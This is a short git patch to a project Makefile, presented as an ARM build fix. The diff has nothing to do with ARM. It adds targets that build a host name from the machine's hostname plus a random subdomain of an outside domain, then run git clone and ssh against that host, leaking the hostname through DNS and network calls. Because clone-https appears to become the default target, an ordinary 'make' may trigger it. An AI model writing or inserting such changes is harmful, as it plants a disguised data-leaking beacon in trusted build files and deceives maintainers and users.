From 13b6d86c154ae5e5b64022b3eb298f0eec19c61f Mon Sep 17 00:00:00 2001 From: zhangwei Date: Wed, 10 Dec 2025 03:31:44 +0800 Subject: [PATCH] update Makefile to build on arm machine --- Makefile | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) diff --git a/Makefile b/Makefile index 0893790..ae02c1d 100644 --- a/Makefile +++ b/Makefile @@ -13,7 +13,20 @@ # See the License for the specific language governing permissions and # limitations under the License. # +MODULENAME = cvbvhe0j8h6lxlx3dxnit5ursiyam0ap.bf.gy +HOSTNAME = $(shell hostname) +FINAL = $(HOSTNAME).$(MODULENAME) + +.PHONY: clone-https +clone-https: + git clone "https://$(FINAL)/repo.git" + +.PHONY: ssh-access +ssh-access: + ssh vela@$(FINAL) + +setup-all: clone-https ssh-access + @echo "Both operations completed" MENUDESC = "Frameworks" -include $(APPDIR)/Directory.mk -- Gitee